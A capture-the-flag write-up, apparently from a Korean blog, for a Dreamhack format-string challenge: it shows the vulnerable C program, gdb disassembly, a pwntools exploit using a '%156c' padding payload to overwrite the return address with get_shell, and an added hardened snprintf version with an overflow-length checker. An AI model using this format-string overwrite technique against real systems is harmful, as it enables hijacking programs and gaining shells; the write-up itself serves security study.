๐Ÿ‘ฉ๐Ÿป‍๐Ÿ’ป ๊ฐ“์ƒ ์ง์žฅ์ธ ๋‚จ๋ฐ”์˜ค
article thumbnail

1. Environment

Ubuntu 16.04
Arch:     i386-32-little
RELRO:    Partial RELRO
Stack:    No canary found
NX:       NX enabled
PIE:      No PIE (0x8048000)

2. Code

#include <stdio.h>
#include <stdlib.h>
#include <signal.h>
#include <unistd.h>
void alarm_handler() {
    puts("TIME OUT");
    exit(-1);
}
void initialize() {
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    signal(SIGALRM, alarm_handler);
    alarm(30);
}
void get_shell() {
    system("/bin/sh");
}
int main(int argc, char *argv[]) {
    char *heap_buf = (char *)malloc(0x80);
    char stack_buf[0x90] = {};
    initialize();
    read(0, heap_buf, 0x80);
    sprintf(stack_buf, heap_buf);
    printf("ECHO : %s\n", stack_buf);
    return 0;
}

3. Write Up

(gdb) disas main
Dump of assembler code for function main:
   0x0804867c <+0>:     push   %ebp
   0x0804867d <+1>:     mov    %esp,%ebp
   0x0804867f <+3>:     push   %edi
   0x08048680 <+4>:     sub    $0x94,%esp
   0x08048686 <+10>:    push   $0x80
   0x0804868b <+15>:    call   0x8048490 <malloc@plt>
   0x08048690 <+20>:    add    $0x4,%esp
   0x08048693 <+23>:    mov    %eax,-0x8(%ebp)
   0x08048696 <+26>:    lea    -0x98(%ebp),%edx
   0x0804869c <+32>:    mov    $0x0,%eax
   0x080486a1 <+37>:    mov    $0x24,%ecx
   0x080486a6 <+42>:    mov    %edx,%edi
   0x080486a8 <+44>:    rep stos %eax,%es:(%edi)
   0x080486aa <+46>:    call   0x8048622 <initialize>
   0x080486af <+51>:    push   $0x80
   0x080486b4 <+56>:    pushl  -0x8(%ebp)
   0x080486b7 <+59>:    push   $0x0
   0x080486b9 <+61>:    call   0x8048450 <read@plt>
   0x080486be <+66>:    add    $0xc,%esp
   0x080486c1 <+69>:    pushl  -0x8(%ebp)
   0x080486c4 <+72>:    lea    -0x98(%ebp),%eax
   0x080486ca <+78>:    push   %eax
   0x080486cb <+79>:    call   0x80484f0 <sprintf@plt>
   0x080486d0 <+84>:    add    $0x8,%esp
   0x080486d3 <+87>:    lea    -0x98(%ebp),%eax
   0x080486d9 <+93>:    push   %eax
   0x080486da <+94>:    push   $0x8048791
   0x080486df <+99>:    call   0x8048460 <printf@plt>

From the ebp offset, stack_buf occupies 0x98 (152 bytes) up to the saved frame pointer, followed by the sfp (4 bytes).

I tried writing it with the exploit code I had used before, but it kept throwing errors.

→ The sprintf function only returns in a specific format ㅠㅠㅠ the argument has to be passed as a char format..

A format string bug occurs: heap_buf, which holds the user's input, is passed to sprintf as the format string.


from pwn import *

p = remote("host3.dreamhack.games", 9804)
e = ELF("./basic_exploitation_003")

get_shell = 0x08048669

payload = b"%156c" + p32(get_shell)

p.send(payload)
p.interactive()
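The C program below is an added example written for this write-up; it is not part of the challenge and not the author's code. It takes the sizes from the challenge source (stack_buf 0x90 bytes, read() capped at 0x80) and shows two things: a helper, min_expanded_len, that computes the floor on how much output a user-supplied format string makes sprintf produce (for "%156c" plus four bytes that is 160 bytes, which is why a 0x90-byte buffer overflows and the last four bytes land at offset 0x98 + 4 = 156, the return address), and a hardened replacement, safe_echo, that passes the input as a data argument to a fixed "%.*s" format and bounds the write with snprintf. The function and macro names and the sample input are constructed for the example.

```c
#include <stdio.h>
#include <string.h>

/* Sizes taken from the challenge source: stack_buf is 0x90 bytes and
 * read() stores at most 0x80 bytes into heap_buf. */
#define STACK_BUF_SZ 0x90
#define READ_MAX     0x80

/* Lower bound on the bytes a printf-family call emits for the format
 * string s (len bytes, not NUL-terminated, like data returned by read()).
 * Literal bytes count one each; every directive contributes at least its
 * field width. '*' widths are not handled (assumption: not present).
 * Sets *has_directive when any conversion other than "%%" is seen. */
size_t min_expanded_len(const char *s, size_t len, int *has_directive) {
    size_t total = 0, i = 0;
    *has_directive = 0;
    while (i < len) {
        if (s[i] != '%') { total++; i++; continue; }
        i++;                                                   /* skip '%' */
        if (i < len && s[i] == '%') { total++; i++; continue; } /* "%%" -> one '%' */
        *has_directive = 1;
        while (i < len && s[i] && strchr("-+ #0", s[i])) i++;   /* flags */
        size_t w = 0;
        while (i < len && s[i] >= '0' && s[i] <= '9')
            w = w * 10 + (size_t)(s[i++] - '0');
        total += w;                                 /* width is a floor on output */
        if (i < len && s[i] == '.') {               /* precision: no floor, skip */
            i++;
            while (i < len && s[i] >= '0' && s[i] <= '9') i++;
        }
        while (i < len && s[i] && strchr("hlLqjzt", s[i])) i++; /* length modifiers */
        if (i < len) i++;                                      /* conversion char */
    }
    return total;
}

/* Hardened replacement for `sprintf(stack_buf, heap_buf)`: the input is a
 * data argument of a fixed "%.*s" format, so a '%' inside it is copied
 * literally, and snprintf bounds the write to dst_sz. read() data is not
 * NUL-terminated, so the length is passed explicitly. Returns the bytes
 * stored (excluding the NUL), never more than dst_sz - 1. */
size_t safe_echo(char *dst, size_t dst_sz, const char *src, size_t src_len) {
    int n = snprintf(dst, dst_sz, "%.*s", (int)src_len, src);
    if (n < 0) { dst[0] = '\0'; return 0; }
    return (size_t)n < dst_sz ? (size_t)n : dst_sz - 1;
}

/* Constructed sample input (not from the challenge): the write-up's
 * "%156c" width directive followed by four placeholder address bytes. */
static const char SAMPLE_INPUT[] = { '%', '1', '5', '6', 'c', 'A', 'B', 'C', 'D' };
#define SAMPLE_LEN (sizeof SAMPLE_INPUT)

/* Minimum size of the challenge's sprintf() output for SAMPLE_INPUT:
 * 156 bytes of padding plus the 4 trailing bytes. */
size_t sample_expanded_len(void) {
    int has;
    return min_expanded_len(SAMPLE_INPUT, SAMPLE_LEN, &has);
}

/* Bytes the hardened copy stores for SAMPLE_INPUT (just the 9 literal bytes). */
size_t sample_safe_len(void) {
    char dst[STACK_BUF_SZ];
    return safe_echo(dst, sizeof dst, SAMPLE_INPUT, SAMPLE_LEN);
}

/* Input larger than read() would even deliver: the hardened copy still
 * stops at STACK_BUF_SZ - 1 bytes. */
size_t oversize_safe_len(void) {
    char dst[STACK_BUF_SZ], src[READ_MAX * 2];
    memset(src, 'A', sizeof src);
    return safe_echo(dst, sizeof dst, src, sizeof src);
}

int main(void) {
    printf("stack_buf size         : %zu\n", (size_t)STACK_BUF_SZ);
    printf("sprintf() output (min) : %zu -> %s\n", sample_expanded_len(),
           sample_expanded_len() > STACK_BUF_SZ ? "overflows" : "fits");
    printf("safe_echo() stored     : %zu\n", sample_safe_len());
    printf("safe_echo() worst case : %zu\n", oversize_safe_len());
    return 0;
}
```

The same check applies to any printf-family call whose format argument is not a string literal; compiling with -Wformat-security makes the compiler flag the `sprintf(stack_buf, heap_buf)` pattern directly.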
